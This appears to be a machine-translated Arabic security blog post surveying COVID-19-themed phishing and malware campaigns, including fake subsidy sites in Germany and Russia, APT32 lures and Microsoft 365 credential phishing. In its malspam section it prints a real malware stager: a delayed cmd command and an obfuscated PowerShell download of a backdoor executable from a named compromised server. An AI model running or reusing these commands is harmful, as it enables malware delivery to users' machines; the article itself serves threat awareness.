يواصل المهاجمون استغلال موضوع COVID-19 ، مما يخلق المزيد والمزيد من التهديدات للمستخدمين المهتمين بشدة بكل ما يتعلق بالوباء. في مقال سابق ، تحدثنا بالفعل عن أنواع البرامج الضارة التي ظهرت في أعقاب فيروس كورونا ، واليوم سنتحدث عن تقنيات الهندسة الاجتماعية التي واجهها المستخدمون بالفعل في بلدان مختلفة ، بما في ذلك في روسيا. الاتجاهات والأمثلة العامة - تحت الخفض.
تذكر آخر مرة تحدثنا فيها عن كيف يقرأ الناس بسهولة ليس فقط عن الفيروس التاجي ومسار الوباء ، ولكن أيضًا عن تدابير الدعم المالي؟ هنا هو مثال جيد. تم اكتشاف هجوم تصيد فضولي في ولاية شمال الراين - وستفاليا إيل إن آر دبليو الألمانية. قام المهاجمون بإنشاء نسخ من الموقع الإلكتروني لوزارة الاقتصاد ( NRW وزارة الشؤون الاقتصادية) ، حيث يمكن لأي شخص تقديم طلب للحصول على مساعدة مالية. مثل هذا البرنامج موجود بالفعل ، وتبين أنه في أيدي المحتالين. بعد تلقي البيانات الشخصية لضحاياهم ، قدموا طلبًا بالفعل على موقع الوزارة على الإنترنت ، لكنهم أشاروا إلى تفاصيل مصرفية أخرى. ووفقًا للأرقام الرسمية ، تم تقديم 4 آلاف طلب مزيف حتى الكشف عن المخطط. ونتيجة لذلك ، وقع 109 مليون دولار مخصص للمواطنين المتضررين في أيدي المحتالين.
هل تريد اختبارًا مجانيًا لـ COVID-19؟
تم العثور على مثال آخر على تصيد الفيروسات التاجية في رسائل البريد الإلكتروني. اجتذبت الرسائل انتباه المستخدمين مع اقتراح للخضوع لاختبار مجاني لعدوى فيروس التاجي. في مرفق هذه الرسائل كانت هناك أمثلة من Trickbot / Qakbot / Qbot. وعندما بدأ أولئك الذين يريدون التحقق من صحتهم في "ملء النموذج المرفق" ، تم تنزيل برنامج نصي ضار إلى جهاز الكمبيوتر. ولتجنب التحقق باستخدام طريقة وضع الحماية ، لم يبدأ البرنامج النصي بتحميل الفيروس الرئيسي إلا بعد مرور بعض الوقت ، عندما اقتنعت أنظمة الأمان بعدم حدوث أي نشاط ضار.كان من السهل أيضًا إقناع معظم المستخدمين بتمكين وحدات الماكرو. للقيام بذلك ، تم استخدام خدعة قياسية ، عندما تملأ الاستبيان تحتاج أولاً إلى تمكين وحدات الماكرو ، مما يعني أنك بحاجة إلى تشغيل البرنامج النصي VBA.
كما ترون ، يتم إخفاء نص VBA خصيصًا من مضادات الفيروسات.
لدى Windows وظيفة انتظار عندما ينتظر التطبيق / T <seconds> قبل قبول إجابة "نعم" بشكل افتراضي. في حالتنا ، انتظر البرنامج النصي 65 ثانية قبل حذف الملفات المؤقتة: وفي عملية الانتظار ، تم تنزيل البرامج الضارة. للقيام بذلك ، تم إطلاق برنامج نصي خاص بـ PowerShell:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
بعد فك ترميز قيمة Base64 ، يقوم البرنامج النصي PowerShell بتحميل الباب الخلفي الموجود على خادم الويب المخترق سابقًا من ألمانيا:http://automatischer-staubsauger.com/feature/777777.png
وحفظه تحت الاسم:C:\Users\Public\tmpdir\file1.exe
‘C:\Users\Public\tmpdir’يتم حذف المجلد عند تشغيل الملف 'tmps1.bat' الذي يحتوي على الأمرcmd /c mkdir ""C:\Users\Public\tmpdir"".الهجوم المستهدف على الجهات الحكومية
بالإضافة إلى ذلك ، أفاد محللو FireEye مؤخرًا عن هجوم مستهدف من APT32 استهدف الهياكل الحكومية في ووهان ، بالإضافة إلى وزارة إدارة الطوارئ الصينية. يحتوي أحد ملفات RTF الموزعة على رابط لمقالة من نيويورك تايمز بعنوان Coronavirus Live Updates: China Tracking Trackers From Hubei . ومع ذلك ، عند قراءته ، حدث تنزيل البرامج الضارة (حدد محللو FireEye المثال باسم METALJACK).ومن المثير للاهتمام أنه في وقت الكشف ، لم يكتشف أي من مضادات الفيروسات هذه الحالة وفقًا لـ Virustotal.
عندما "تكذب" المواقع الرسمية
حدث ألمع مثال على هجوم التصيد الاحتيالي في روسيا في ذلك اليوم. والسبب في ذلك هو تعيين البدل الذي طال انتظاره للأطفال الذين تتراوح أعمارهم بين 3 و 16 سنة. عندما تم الإعلان عن بدء قبول الطلبات في 12 مايو 2020 ، هرع الملايين إلى موقع خدمات الدولة للحصول على المساعدة التي طال انتظارها وأسقطوا البوابة ليس أسوأ من هجوم DDoS محترف. عندما قال الرئيس إن "خدمات الدولة لا يمكنها التعامل مع تدفق الطلبات" ، بدأوا يتحدثون عن حقيقة أن موقعًا بديلاً لقبول الطلبات قد بدأ العمل.
تكمن المشكلة في أن العديد من المواقع قد اكتسبت دفعة واحدة ، وبينما يقبل موقع واحد ، هو الموقع الحقيقي في posobie16.gosuslugi.ru ، التطبيقات حقًا ، فإن عشرات أخرى تجمع البيانات الشخصية للمستخدمين الموثوق بهم .وجد زملاء من HeartInform حوالي 30 نطاقًا احتياليًا جديدًا في منطقة .ru. قامت شركة Infosecurity التابعة لشركة Softline بتتبع أكثر من 70 موقعًا للخدمات العامة المزيفة المماثلة منذ أوائل أبريل. يتعامل منشئو المحتوى مع الرموز المألوفة ، ويستخدمون أيضًا مجموعات من الكلمات gosuslugi و gosuslugi-16 و vyplaty و covid-vyplaty و posobie وما إلى ذلك.Agiotage والهندسة الاجتماعية
تؤكد كل هذه الأمثلة فقط أن المهاجمين نجحوا في استثمار موضوع الفيروسات التاجية بنجاح. وكلما زاد التوتر الاجتماعي والأسئلة غير الواضحة ، زادت فرصة المحتالين لسرقة البيانات المهمة ، أو إجبار الناس على إعطاء أموالهم بأنفسهم ، أو ببساطة اختراق المزيد من أجهزة الكمبيوتر.وبالنظر إلى أن الوباء جعل الأشخاص غير المستعدين للعمل من المنزل بأعداد كبيرة ، ليس فقط الشخصية ، ولكن أيضًا بيانات الشركة معرضة للخطر. على سبيل المثال ، تعرض مستخدمو Microsoft 365 (Office 365 سابقًا) أيضًا لهجوم التصيد. تلقى الناس بشكل كبير الرسائل الصوتية "الفائتة" في مرفقات الرسائل. ومع ذلك ، في الواقع ، كانت الملفات صفحة HTML التي أرسلت ضحايا الهجوم إلى صفحة تسجيل الدخول المزيفة لـ Microsoft 365. ونتيجة لذلك - فقدان الوصول والتنازل عن جميع البيانات من الحساب.